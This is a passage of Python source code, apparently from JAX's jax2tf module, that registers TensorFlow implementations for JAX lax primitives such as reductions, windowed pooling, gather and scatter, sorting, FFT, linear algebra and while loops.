for lhs_axis, rhs_axis in zip(lhs_contracting, rhs_contracting):
shared_id = next(new_id)
lhs_axis_ids[lhs_axis] = shared_id
rhs_axis_ids[rhs_axis] = shared_id
lhs_out_axis_ids[lhs_axis] = None # type: ignore[call-overload]
rhs_out_axis_ids[rhs_axis] = None # type: ignore[call-overload]
batch_ids = []
for lhs_axis, rhs_axis in zip(lhs_batch, rhs_batch):
shared_id = next(new_id)
lhs_axis_ids[lhs_axis] = shared_id
rhs_axis_ids[rhs_axis] = shared_id
lhs_out_axis_ids[lhs_axis] = None # type: ignore[call-overload]
rhs_out_axis_ids[rhs_axis] = None # type: ignore[call-overload]
batch_ids.append(shared_id)
not_none = lambda x: x is not None
out_axis_ids = list(
filter(not_none, batch_ids + lhs_out_axis_ids + rhs_out_axis_ids))
assert lhs.dtype == rhs.dtype
spec = "{},{}->{}".format("".join(lhs_axis_ids), "".join(rhs_axis_ids),
"".join(out_axis_ids))
return tf.linalg.einsum(spec, lhs, rhs)
tf_impl_with_avals[lax.dot_general_p] = _dot_general
def _broadcast(operand, *, sizes):
result_shape = tf.TensorShape(sizes).concatenate(operand.shape)
return tf.broadcast_to(operand, result_shape)
tf_impl[lax.broadcast_p] = _broadcast
def _broadcast_in_dim(operand, *, shape, broadcast_dimensions):
inshape = [1] * len(shape)
for orig_shape_i, broadcast_dim_i in zip(operand.shape, broadcast_dimensions):
if orig_shape_i != 1:
inshape[broadcast_dim_i] = shape[broadcast_dim_i]
inshape_tf = _eval_shape(inshape)
shape_tf = _eval_shape(shape)
return tf.broadcast_to(tf.reshape(operand, inshape_tf), shape_tf)
tf_impl[lax.broadcast_in_dim_p] = _broadcast_in_dim
def _reshape(operand, *, new_sizes, dimensions):
if dimensions is None:
dimensions = tf.range(tf.rank(operand))
new_sizes_tf = _eval_shape(new_sizes)
return tf.reshape(tf.transpose(operand, dimensions), new_sizes_tf)
tf_impl[lax.reshape_p] = _reshape
def _squeeze(operand, *, dimensions, _in_avals, _out_aval):
op_shape = _in_avals[0].shape
new_shape = tuple(d for i, d in enumerate(op_shape) if i not in dimensions)
new_shape_tf = _eval_shape(new_shape)
return tf.reshape(operand, new_shape_tf)
tf_impl_with_avals[lax.squeeze_p] = _squeeze
def _pad(operand, padding_value, *, padding_config,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
del _in_avals
low, high, interior = util.unzip3(padding_config)
if _enable_xla:
out = tfxla.pad(operand, padding_value, low, high, interior)
return out
if all(lo >= 0 and hi >= 0 and i == 0 for lo, hi, i in padding_config):
return tf.pad(
operand,
util.safe_zip(low, high),
mode="CONSTANT",
constant_values=padding_value)
raise _xla_disabled_error("pad", "Only use cases without interior or negative padding can be converted without XLA.")
tf_impl_with_avals[lax.pad_p] = _pad
def _rev(operand, *, dimensions):
return tf.reverse(operand, dimensions)
tf_impl[lax.rev_p] = _rev
tf_impl[lax.select_p] = tf.where
def _transpose(operand, *, permutation):
return tf.transpose(operand, perm=permutation)
tf_impl[lax.transpose_p] = _transpose
axes_to_axis = lambda func: lambda operand, axes: func(operand, axis=axes)
tf_impl[lax.reduce_sum_p] = (
bool_to_int8(axes_to_axis(tf.reduce_sum), argnums=0))
tf_impl[lax.reduce_prod_p] = (
bool_to_int8(axes_to_axis(tf.reduce_prod), argnums=0))
tf_impl[lax.reduce_max_p] = (
bool_to_int8(axes_to_axis(tf.reduce_max), argnums=0))
tf_impl[lax.reduce_min_p] = (
bool_to_int8(axes_to_axis(tf.reduce_min), argnums=0))
tf_impl[lax.reduce_or_p] = axes_to_axis(tf.reduce_any)
tf_impl[lax.reduce_and_p] = axes_to_axis(tf.reduce_all)
def _argminmax(fn, operand, axes, index_dtype):
axis, = axes
output_type = tf.int32
if dtypes.iinfo(index_dtype).bits > 32:
output_type = tf.int64
# TODO(phawkins): handle axes larger than 2^31.
result = fn(operand, axis=axis, output_type=output_type)
return tf.cast(result, to_tf_dtype(index_dtype))
tf_impl[lax.argmin_p] = functools.partial(_argminmax, tf.math.argmin)
tf_impl[lax.argmax_p] = functools.partial(_argminmax, tf.math.argmax)
_add_fn = tf.function(_add, autograph=False)
_ge_fn = tf.function(tf.math.greater_equal, autograph=False)
def _select_and_gather_add(
tangents: TfVal, operand: TfVal, select_prim: core.Primitive,
window_dimensions: Sequence[int], window_strides: Sequence[int],
base_dilation: Sequence[int], window_dilation: Sequence[int],
padding: Sequence[Tuple[int, int]], _in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
# Note: this function follows the pattern in
# jax.lax._select_and_gather_add_translation.
dtype = operand.dtype
nbits = dtypes.finfo(dtype.as_numpy_dtype).bits
# Specializing the function for 64 bits. Only up to 32 bits are supported on TPU,
# we thus intend to let the code throw a different exception on this platform.
max_bits = 64
assert nbits <= max_bits
double_word_reduction = nbits * 2 <= max_bits
const = lambda dtype, x: tf.constant(np.array(x), dtype)
if double_word_reduction:
word_dtype = lax._UINT_DTYPES[nbits]
double_word_dtype = lax._UINT_DTYPES[nbits * 2]
# Packs two values into a tuple.
def pack(a, b):
a = _bitcast_convert_type(a, word_dtype)
b = _bitcast_convert_type(b, word_dtype)
a = _convert_element_type(a, new_dtype=double_word_dtype)
b = _convert_element_type(b, new_dtype=double_word_dtype)
a = tf.bitwise.left_shift(a, const(double_word_dtype, nbits))
return tf.bitwise.bitwise_or(a, b)
# Unpacks the first element of a tuple.
def fst(t):
assert t.dtype == double_word_dtype
st = _shift_right_logical(t, const(double_word_dtype, nbits))
return _bitcast_convert_type(
_convert_element_type(st, new_dtype=word_dtype), dtype)
# Unpacks the second element of a tuple.
def snd(t):
return _bitcast_convert_type(
_convert_element_type(t, new_dtype=word_dtype), dtype)
else:
raise NotImplementedError(
f"TODO: need to pack {nbits * 2} bits but this platform can only go up to {max_bits} bits."
)
assert select_prim is lax.ge_p or select_prim is lax.le_p, select_prim
def reducer(x, y):
which = tf_impl[select_prim]
return tf_impl[lax.select_p](which(fst(x), fst(y)), x=x, y=y)
init = -np.inf if select_prim is lax.ge_p else np.inf
init_identity = lambda x: pack(const(dtype, init), const(dtype, 0))
out = _specialized_reduce_window(
reducer,
init_identity,
pack(operand, tangents),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
base_dilation=base_dilation,
window_dilation=window_dilation,
_in_avals=_in_avals,
_out_aval=_out_aval)
return snd(out)
tf_impl_with_avals[lax.select_and_gather_add_p] = _select_and_gather_add
def _get_shape_from_tensor_or_array(x):
if isinstance(x.shape, tf.TensorShape):
return tuple(x.shape.as_list())
return tuple(x.shape)
def _common_reduce_window(operand, init_val, reducer, window_dimensions,
window_strides, padding, base_dilation,
window_dilation, _in_avals, _out_aval):
o_spec = tf.TensorSpec((), dtype=operand.dtype)
reducer_fn = tf.function(
reducer, autograph=False).get_concrete_function(o_spec, o_spec)
if not isinstance(init_val, tf.Tensor):
assert not config.jax_enable_checks or _is_tfval(
init_val), f"Non TfVal: {init_val}"
init_val = tf.constant(init_val, operand.dtype)
out = tfxla.reduce_window(
operand,
init_val,
reducer_fn,
window_dimensions,
window_strides,
base_dilations=base_dilation,
window_dilations=window_dilation,
padding=padding)
# TODO: implement shape inference for XlaReduceWindow
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
def _reduce_window(operand, init_value, *, jaxpr, consts, window_dimensions,
window_strides, padding, base_dilation, window_dilation,
_in_avals, _out_aval):
"""TensorFlow implementation of reduce_window.
Args:
operand: N dimensional array containing elements of type T
init_value: starting value of the reduction
jaxpr: the jaxpr corresponding to the reduction function
consts: the constants associated with jaxpr.
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
Returns:
The reduced operand.
"""
assert len(consts) == 0, "Reduction computation cannot have constants"
if not _enable_xla:
raise _xla_disabled_error("reduce_window")
def reducer(arg1: TfVal, arg2: TfVal) -> TfVal:
closed_jaxpr = core.ClosedJaxpr(jaxpr, consts)
res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
return res
return _common_reduce_window(operand, init_value, reducer, window_dimensions,
window_strides, padding, base_dilation,
window_dilation, _in_avals, _out_aval)
# _try_tf_pool currently only supports reduce_window_max and reduce_window_sum.
# TODO(bchetioui): this function is not exhaustive wrt which
# reduce_window_max or reduce_window_sum cases can be translated into a call to
# max_pool or avg_pool. Further investigation is needed to fully flesh it out.
def _try_tf_pool(op_name, operand, window_dimensions, window_strides, padding,
base_dilation, window_dilation) -> TfVal:
def error(msg):
suffix = ("See source code for the precise conditions under which "
"reduce_window can be converted without XLA.")
return _xla_disabled_error("reduce_window", f"{msg} - {suffix}")
dtype = operand.dtype
# Contrarily to the main path, tf.int8 is actually a valid type for
# tf.nn.max_pool.
if op_name == "reduce_window_max" and dtype in [
tf.bool, tf.uint32, tf.uint64, tf.complex64, tf.complex128
]:
raise error(f"tf.nn.max_pool does not support operands of type {dtype}")
if op_name == "reduce_window_sum" and operand.dtype not in [
tf.float16, tf.float32, tf.float64
]:
raise error(f"tf.nn.avg_pool does not support operands of type {dtype}")
has_batch_dim = window_dimensions[0] == 1
has_channel_dim = window_dimensions[-1] == 1
nb_spatial_dimensions = len(operand.shape) - has_batch_dim - has_channel_dim
if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
raise error("TensorFlow can only handle pooling for arrays with 1, 2, or "
"3 spatial dimensions")
# TODO(bchetioui): does a simple conversion with another base dilation exist?
if list(base_dilation) != [1] * len(operand.shape):
raise error("Unimplemented support for base dilation")
# TODO(bchetioui): does a simple conversion with another window_dilation
# exist? The whole story seems similar to convolution.
if list(window_dilation) != [1] * len(operand.shape):
raise error("Unimplemented support for window dilation")
if list(padding) != [(0, 0)] * len(operand.shape):
raise error("Unimplemented support for padding")
# ReduceWindow in XLA takes an array of rank N as a parameter, but
# tf.nn.max_pool / tf.nn.avg_pool take an array of rank N+2, with a default
# shape of the form [batch_size] + input_spatial_shape + [num_channels]
tf_operand = operand
tf_window_dimensions = list(window_dimensions)
tf_window_strides = list(window_strides)
if not has_batch_dim:
tf_operand = tf.expand_dims(tf_operand, 0)
tf_window_dimensions = [1] + tf_window_dimensions
tf_window_strides = [1] + tf_window_strides
if not has_channel_dim:
tf_operand = tf.expand_dims(tf_operand, -1)
tf_window_dimensions.append(1)
tf_window_strides.append(1)
tf_data_format = "N" + "DHW"[-nb_spatial_dimensions:] + "C"
tf_padding = "VALID"
if op_name == "reduce_window_max":
result = tf.nn.max_pool(tf_operand, tf_window_dimensions, tf_window_strides,
tf_padding, tf_data_format)
elif op_name == "reduce_window_sum":
avg = tf.nn.avg_pool(tf_operand, tf_window_dimensions, tf_window_strides,
tf_padding, tf_data_format)
result = avg * np.prod(tf_window_dimensions)
else:
raise error(f"Unimplemented support for {op_name}")
if not has_batch_dim:
result = tf.squeeze(result, 0)
if not has_channel_dim:
result = tf.squeeze(result, -1)
return result
def _specialized_reduce_window(reducer,
identity,
operand,
*,
window_dimensions,
window_strides,
padding,
base_dilation,
window_dilation,
_in_avals,
_out_aval,
name=None):
"""Wraps the TensorFlow reduce window operation based on a reducer and an
identity function defining the initial value of the reduction depending on
the dtype of the operand.
Args:
reducer: reduction function of type TfVal -> TfVal -> TfVal
identity: function that takes a TensorFlow dtype as a parameter and returns
the starting value of the reduction.
operand: N dimensional array containing elements of type T
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
name: the name of the specialized reduce window primitive for which this
conversion function is called. This information may help to choose a
different conversion path (optional)
Returns:
The reduced operand.
"""
if not _enable_xla and name in ["reduce_window_max", "reduce_window_sum"]:
return _try_tf_pool(name, operand, window_dimensions, window_strides,
padding, base_dilation, window_dilation)
return _common_reduce_window(operand, identity(operand.dtype), reducer,
window_dimensions, window_strides, padding,
base_dilation, window_dilation, _in_avals,
_out_aval)
def _get_max_identity(tf_dtype):
numpy_tf_dtype = tf_dtype.as_numpy_dtype
if tf_dtype == tf.bfloat16 or dtypes.issubdtype(numpy_tf_dtype, np.inexact):
return numpy_tf_dtype(-np.inf)
elif dtypes.issubdtype(numpy_tf_dtype, np.integer):
return dtypes.iinfo(numpy_tf_dtype).min
else:
assert dtypes.issubdtype(
numpy_tf_dtype, np.bool_), (f"{tf_dtype} has no defined max identity")
return False
def _get_min_identity(tf_dtype):
numpy_tf_dtype = tf_dtype.as_numpy_dtype
if tf_dtype == tf.bfloat16 or dtypes.issubdtype(numpy_tf_dtype, np.inexact):
return numpy_tf_dtype(np.inf)
elif dtypes.issubdtype(numpy_tf_dtype, np.integer):
return dtypes.iinfo(numpy_tf_dtype).max
else:
assert dtypes.issubdtype(
numpy_tf_dtype, np.bool_), (f"{tf_dtype} has no defined min identity")
return True
# pylint: disable=protected-access
tf_impl_with_avals[lax.reduce_window_sum_p] = (
functools.partial(
_specialized_reduce_window, _add, lambda x: 0,
name="reduce_window_sum"))
tf_impl_with_avals[lax.reduce_window_min_p] = (
functools.partial(
_specialized_reduce_window,
tf.math.minimum,
_get_min_identity,
name="reduce_window_min"))
tf_impl_with_avals[lax.reduce_window_max_p] = (
functools.partial(
_specialized_reduce_window,
tf.math.maximum,
_get_max_identity,
name="reduce_window_max"))
tf_impl_with_avals[lax.reduce_window_p] = _reduce_window
# pylint: enable=protected-access
# We use lax_control_flow._cumred_tpu_translation_rule to convert cummax,
# cummin, cumsum and cumprod. This is efficient on TPU, but the complexity is
# O(n^2) on other backends. This may be implemented using associative_scan
# instead to favor different backends.
tf_impl_with_avals[lax_control_flow.cummin_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_min),
multiple_results=False)
tf_impl_with_avals[lax_control_flow.cummax_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_max),
multiple_results=False)
# TODO(bchetioui): cumsum and cumprod can be converted using pure TF ops for
# certain dtypes: bfloat16, float16, float32, float64, and int32. Other dtypes
# will fail when running in compiled mode, but are otherwise compatible with
# the operation. A non-XLA path can thus be defined for all dtypes, though the
# tests will crash.
tf_impl_with_avals[lax_control_flow.cumsum_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_sum),
multiple_results=False)
tf_impl_with_avals[lax_control_flow.cumprod_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_prod),
multiple_results=False)
def _select_and_scatter(operand, source, init_value, select_jaxpr,
select_consts, scatter_jaxpr, scatter_consts,
window_dimensions, window_strides, padding):
raise NotImplementedError("TODO: jax2tf can not convert _select_and_scatter")
tf_impl[lax.select_and_scatter_p] = _select_and_scatter
@functools.partial(bool_to_int8, argnums=(0, 1))
def _select_and_scatter_add(source, operand, *, select_prim, window_dimensions,
window_strides, padding, _in_avals, _out_aval):
if not _enable_xla:
raise _xla_disabled_error("select_and_scatter_add")
init_value = tf.zeros((), operand.dtype)
select_fn = (
tf.function(tf_impl[select_prim], autograph=False).get_concrete_function(
init_value, init_value))
scatter_fn = _add_fn.get_concrete_function(init_value, init_value)
out = tfxla.select_and_scatter(operand, window_dimensions, window_strides,
padding, source, init_value, select_fn,
scatter_fn)
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.select_and_scatter_add_p] = _select_and_scatter_add
def _threefry2x32_jax_impl(*args: TfVal, _in_avals, _out_aval):
res = _convert_jax_impl(
functools.partial(
jax._src.random._threefry2x32_lowering, use_rolled_loops=False),
multiple_results=True)(
*args, _in_avals=_in_avals, _out_aval=_out_aval)
return res
tf_impl_with_avals[jax.random.threefry2x32_p] = _threefry2x32_jax_impl
# Use the vmap implementation, otherwise on TPU the performance is really bad
# With use_vmap=True on, we get about the same performance for JAX and jax2tf.
tf_impl_with_avals[random.random_gamma_p] = _convert_jax_impl(
functools.partial(jax._src.random._gamma_impl, use_vmap=True),
multiple_results=False)
def _gather_dimensions_proto(indices_shape, dimension_numbers):
proto = xla_data_pb2.GatherDimensionNumbers()
proto.offset_dims.extend(dimension_numbers.offset_dims)
proto.collapsed_slice_dims.extend(dimension_numbers.collapsed_slice_dims)
proto.start_index_map.extend(dimension_numbers.start_index_map)
assert indices_shape
proto.index_vector_dim = len(indices_shape) - 1
return proto
@functools.partial(bool_to_int8, argnums=0)
def _gather(operand, start_indices, *, dimension_numbers, slice_sizes,
_in_avals, _out_aval):
"""Tensorflow implementation of gather."""
del _in_avals
if not _enable_xla:
raise _xla_disabled_error("gather")
proto = _gather_dimensions_proto(start_indices.shape, dimension_numbers)
slice_sizes_tf = _eval_shape(slice_sizes)
out = tfxla.gather(operand, start_indices, proto, slice_sizes_tf, False)
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.gather_p] = _gather
def _slice(operand, start_indices, limit_indices, strides, _in_avals,
_out_aval):
if strides is None:
strides = [1] * len(start_indices)
slices = tuple(
map(slice, _eval_shape(start_indices), _eval_shape(limit_indices),
_eval_shape(strides)))
out = operand[slices]
# TODO(b/184503314): improve shape inference for __getitem__
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.slice_p] = _slice
def _dynamic_slice(operand, *start_indices, slice_sizes,
_in_avals: Sequence[core.ShapedArray],
_out_aval: core.ShapedArray):
# Here we could use tf.slice. Similarly, for lax.gather we can sometimes use
# tf.gather. But those have different semantics for index-out-of-bounds than
# JAX (and XLA). We have tried to force compilation, by wrapping into
# tf.xla.experimental.compile, or tf.function(jit_compile=True), but
# those solutions are brittle because they do not work when nested into an
# outer compilation (see b/162814494 and b/163006262). They also do not
# survive well being put in a SavedModel. Hence, we now use TFXLA slicing
# and gather ops.
if not _enable_xla:
raise _xla_disabled_error("dynamic_slice")
res = tfxla.dynamic_slice(
operand, tf.stack(start_indices), size_indices=_eval_shape(slice_sizes))
# TODO: implement shape inference for XlaDynamicSlice
res.set_shape(_aval_to_tf_shape(_out_aval))
return res
tf_impl_with_avals[lax.dynamic_slice_p] = _dynamic_slice
def _scatter_dimensions_proto(indices_shape, dimension_numbers):
proto = xla_data_pb2.ScatterDimensionNumbers()
proto.update_window_dims.extend(dimension_numbers.update_window_dims)
proto.inserted_window_dims.extend(dimension_numbers.inserted_window_dims)
proto.scatter_dims_to_operand_dims.extend(
dimension_numbers.scatter_dims_to_operand_dims)
assert indices_shape
proto.index_vector_dim = len(indices_shape) - 1
return proto
def _scatter(operand, scatter_indices, updates, *, update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
del unique_indices, _in_avals
assert len(update_consts) == 0, "Update computation cannot have constants"
if not _enable_xla:
raise _xla_disabled_error("scatter")
proto = _scatter_dimensions_proto(scatter_indices.shape, dimension_numbers)
def update_computation(arg1: TfVal, arg2: TfVal) -> TfVal:
closed_jaxpr = core.ClosedJaxpr(update_jaxpr, update_consts)
res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
return res
o_spec = tf.TensorSpec((), dtype=operand.dtype)
xla_update_computation = (
tf.function(update_computation,
autograph=False).get_concrete_function(o_spec, o_spec))
out = tfxla.scatter(
operand,
scatter_indices,
updates,
xla_update_computation,
proto,
indices_are_sorted=indices_are_sorted)
# TODO: implement shape analysis for XlaScatter
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.scatter_p] = _scatter
tf_impl_with_avals[lax.scatter_min_p] = _scatter
tf_impl_with_avals[lax.scatter_max_p] = _scatter
tf_impl_with_avals[lax.scatter_mul_p] = _scatter
tf_impl_with_avals[lax.scatter_add_p] = _scatter
def _dynamic_update_slice(operand, update, *start_indices):
if not _enable_xla:
raise _xla_disabled_error("dynamic_update_slice")
return tfxla.dynamic_update_slice(operand, update, tf.stack(start_indices))
tf_impl[lax.dynamic_update_slice_p] = _dynamic_update_slice
def _cond(index: TfVal, *operands: TfVal, branches: Sequence[core.ClosedJaxpr],
linear: Sequence[bool]) -> Sequence[TfVal]:
del linear
# tf.cond needs lambdas with no arguments.
branches_tf = [
functools.partial(_interpret_jaxpr, jaxpr, *operands)
for jaxpr in branches
]
return tf.switch_case(index, branches_tf)
tf_impl[lax_control_flow.cond_p] = _cond
def _while(*args: TfVal, cond_nconsts: int, cond_jaxpr: core.ClosedJaxpr,
body_nconsts: int, body_jaxpr: core.ClosedJaxpr) -> Sequence[TfVal]:
cond_consts, body_consts, init_carry = util.split_list(
args, [cond_nconsts, body_nconsts])
if cond_jaxpr.out_avals[0].shape: # type: ignore[attr-defined]
# The conditional is not a scalar, this must be a batched while
return _batched_cond_while(
*args,
cond_nconsts=cond_nconsts,
cond_jaxpr=cond_jaxpr,
body_nconsts=body_nconsts,
body_jaxpr=body_jaxpr)
# The conditional must return a single value to TF
def cond_tf_func(*args: TfVal) -> TfVal:
pred, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *args)
return pred
body_tf_func = functools.partial(_interpret_jaxpr, body_jaxpr, *body_consts)
return tf.while_loop(cond_tf_func, body_tf_func, init_carry)
def _batched_cond_while(*args: TfVal, cond_nconsts: int,
cond_jaxpr: core.ClosedJaxpr, body_nconsts: int,
body_jaxpr: core.ClosedJaxpr) -> Sequence[TfVal]:
"""Interprets a while_loop with a batched condition.
A batched while has a conditional that returns a tensor of booleans, and
a body that returns a list of tensors whose leading dimensions match those
of the conditional tensor.
We need to turn it into a while with scalar boolean conditional. We will
expand the loop carry to include a prefix with the current tensor boolean
condition. We prepend to the loop the first calculation of the tensor boolean
condition. The loop condition will use a "reduce_any" to calculate a scalar
boolean from the tensor boolean condition. The end of the loop body will
compute the new carry using a "tf.where", and we compute the new tensor
boolean condition.
"""
cond_consts, body_consts, init_carry = util.split_list(
args, [cond_nconsts, body_nconsts])
# Initial computation of batched condition
init_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *init_carry)
assert init_pred_b is not core.unit
def new_cond_tf_func(pred_b: TfVal, *carry: TfVal) -> TfVal:
pred = tf.reduce_any(pred_b, axis=list(range(len(pred_b.shape))))
return pred
def new_body_tf_func(pred_b: TfVal, *carry: TfVal) -> Sequence[TfVal]:
new_carry: Sequence[TfVal] = _interpret_jaxpr(body_jaxpr, *body_consts,
*carry)
def select_one_carry(new_c: TfVal, c: TfVal) -> TfVal:
pred_b_bcast = _broadcast_in_dim(
pred_b,
shape=new_c.shape,
broadcast_dimensions=list(range(len(pred_b.shape))))
return tf.where(pred_b_bcast, new_c, c)
selected_carry: Sequence[TfVal] = list(
util.safe_map(select_one_carry, new_carry, carry))
next_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *selected_carry)
return (next_pred_b, *selected_carry)
_, *res_carry = tf.while_loop(new_cond_tf_func, new_body_tf_func,
(init_pred_b, *init_carry))
return res_carry
tf_impl[lax_control_flow.while_p] = _while
# We use the scan impl rule to rewrite in terms of while.
tf_impl_with_avals[lax_control_flow.scan_p] = _convert_jax_impl(
lax_control_flow._scan_impl)
def _top_k(operand: TfVal, k: int) -> Tuple[TfVal, TfVal]:
# Some types originally incompatible with tf.math.top_k can be promoted
# to a compatible type without loss of precision.
def promote_tf_dtype(tf_dtype):
if tf_dtype in [tf.bool, tf.uint8, tf.uint16]:
return tf.uint32
if tf_dtype in [tf.int8, tf.int16]:
return tf.int32
if tf_dtype is tf.float16:
return tf.float32
return None
conversion_dtype = promote_tf_dtype(operand.dtype)
if conversion_dtype:
values, indices = tf.math.top_k(
tf.dtypes.cast(operand, conversion_dtype), k=k, sorted=True)
return tf.dtypes.cast(values, operand.dtype), indices
else:
return tf.math.top_k(operand, k=k, sorted=True)
tf_impl[lax.top_k_p] = _top_k
def _sort(*operands: TfVal, dimension: int, is_stable: bool,
num_keys: int) -> Tuple[TfVal, ...]:
if not _enable_xla:
raise _xla_disabled_error("sort")
assert 1 <= num_keys <= len(operands)
assert 0 <= dimension < len(
operands[0].shape
), f"Invalid {dimension} for ndim {len(operands[0].shape)}"
# The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1]
# corresponding to two scalars from operand[k].
def lexicographic_comparator_old(*tf_args: TfVal) -> TfVal:
assert len(tf_args) == 2 * len(operands)
# We build a comparison:
# arg[0] < arg[1] or (arg[0] == arg[1] and (arg[2] < arg[3] or ...))
# all the way to arg[2 * num_keys - 2] < arg[2 * num_keys - 1]
inside_comparison = None
for key_idx in range(num_keys - 1, -1, -1):
a = tf_args[2 * key_idx]
b = tf_args[2 * key_idx + 1]
a_lt_b = tf.math.less(a, b)
if inside_comparison is None:
inside_comparison = a_lt_b
else:
inside_comparison = tf.math.logical_or(
a_lt_b, tf.math.logical_and(tf.math.equal(a, b), inside_comparison))
return inside_comparison
comparator_spec: List[tf.TensorSpec] = []
comparator_jax_in_avals: List[core.AbstractValue] = []
for op in operands:
o_spec = tf.TensorSpec((), dtype=op.dtype)
comparator_spec.extend([o_spec, o_spec])
o_aval = core.ShapedArray((), to_jax_dtype(op.dtype))
comparator_jax_in_avals.extend([o_aval, o_aval])
# Use the same comparator that JAX uses when compiling to XLA, to get the
# proper NaN/Inf total order, and the lexicographic ordering.
# The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1]
# corresponding to two scalars from operand[k].
def lexicographic_comparator(*tf_args: TfVal) -> TfVal:
return _convert_jax_impl(
lax._sort_lt_comparator, multiple_results=False)(
*tf_args,
_in_avals=comparator_jax_in_avals,
_out_aval=core.ShapedArray((), np.bool_),
num_keys=num_keys)
xla_comparator_computation = (
tf.function(lexicographic_comparator,
autograph=False).get_concrete_function(*comparator_spec))
results = tfxla.variadic_sort(
operands,
dimension=dimension,
is_stable=is_stable,
comparator=xla_comparator_computation)
return results
tf_impl[lax.sort_p] = _sort
def _fft(x, fft_type, fft_lengths):
FFT, IFFT, RFFT, IRFFT = list(map(xla_client.FftType, [0, 1, 2, 3]))
if fft_type == IRFFT:
expected_lengths = x.shape[-len(fft_lengths):-1] + ((x.shape[-1] - 1) * 2,)
else:
expected_lengths = x.shape[-len(fft_lengths):]
if expected_lengths != fft_lengths:
raise NotImplementedError(
f"Unsupported fft_lengths={fft_lengths} for fft_type={fft_type} of "
f"array with shape={x.shape}.")
tf_funcs = {
FFT: [tf.signal.fft, tf.signal.fft2d, tf.signal.fft3d],
IFFT: [tf.signal.ifft, tf.signal.ifft2d, tf.signal.ifft3d],
RFFT: [tf.signal.rfft, tf.signal.rfft2d, tf.signal.rfft3d],
IRFFT: [tf.signal.irfft, tf.signal.irfft2d, tf.signal.irfft3d]
}
return tf_funcs[fft_type][len(fft_lengths) - 1](x)
tf_impl[lax_fft.fft_p] = _fft
def _qr(operand, full_matrices):
return tf.linalg.qr(operand, full_matrices=full_matrices)
tf_impl[lax_linalg.qr_p] = _qr
def _svd(operand, full_matrices, compute_uv):
result = tf.linalg.svd(operand, full_matrices, compute_uv)
if not compute_uv:
return result,
s, u, v = result
return s, u, tf.linalg.adjoint(v)
tf_impl[lax_linalg.svd_p] = _svd
def _eig(operand: TfVal, compute_left_eigenvectors: bool,
compute_right_eigenvectors: bool):
if compute_left_eigenvectors and compute_right_eigenvectors:
# TODO(bchetioui): didn't find a 100% reliable, easy and satisfying way to
# sort the left eigenvectors in the right order. The jax.numpy.linalg API
# suggests to me that left eigenvectors are anyway seldom used, so I
# think it is acceptable to leave as unimplemented for now.
msg = ("Conversion of eig is not implemented when both "
"compute_left_eigenvectors and compute_right_eigenvectors are set "
"to True.")
raise NotImplementedError(msg)
elif not (compute_left_eigenvectors or compute_right_eigenvectors):
return tuple([tf.linalg.eigvals(operand)])
elif compute_right_eigenvectors:
return tuple(tf.linalg.eig(operand))
else: # compute_left_eigenvectors == True
wH, vl = tf.linalg.eig(tf.linalg.adjoint(operand))
wHH = tf.math.conj(wH)
return tuple([wHH, vl])
tf_impl[lax_linalg.eig_p] = _eig
def _eigh(operand: TfVal, lower: bool, _in_avals, _out_aval):
if operand.shape[-1] == 0:
v, w = operand, tf.reshape(operand, _eval_shape(_in_avals[0].shape[:-1]))
else:
if not lower:
operand = tf.linalg.adjoint(operand)
w, v = tf.linalg.eigh(operand)
cast_type = {
tf.complex64: tf.float32,
tf.complex128: tf.float64
}.get(operand.dtype)
if cast_type is not None:
w = tf.cast(w, cast_type)
return v, w
tf_impl_with_avals[lax_linalg.eigh_p] = _eigh
def _lu(operand: TfVal, _in_avals, _out_aval):
return _convert_jax_impl(lax_linalg._lu_python)(
operand, _in_avals=_in_avals, _out_aval=_out_aval)
tf_impl_with_avals[lax_linalg.lu_p] = _lu
def _triangular_solve(a: TfVal, b: TfVal, *, left_side: bool, lower: bool,
transpose_a: bool, conjugate_a: bool, unit_diagonal: bool,
_in_avals: Sequence[core.ShapedArray],
_out_aval: core.ShapedArray):
if unit_diagonal:
a_aval, _ = _in_avals
a_shape = _eval_shape(a_aval.shape)
a = tf.linalg.set_diag(a, tf.ones(a_shape[:-1], dtype=a.dtype))
if not left_side:
rank = len(a.shape)
transpose_dimensions = list(range(rank - 2)) + [rank - 1, rank - 2]
a = tf.transpose(a, transpose_dimensions)
b = tf.transpose(b, transpose_dimensions)
lower = not lower
# adjoint == transpose for real dtypes, so special care need only be taken
# for complex types.
if a.dtype in [tf.complex64, tf.complex128]:
if (transpose_a and not conjugate_a) or (not transpose_a and conjugate_a):
a = tf.math.conj(a)
result = tf.linalg.triangular_solve(a, b, lower=lower, adjoint=transpose_a)
if not left_side:
result = tf.transpose(result, transpose_dimensions)
return result
tf_impl_with_avals[lax_linalg.triangular_solve_p] = _triangular_solve
def _linear_solve(*args: TfVal, const_lengths, jaxprs, _in_avals, _out_aval):
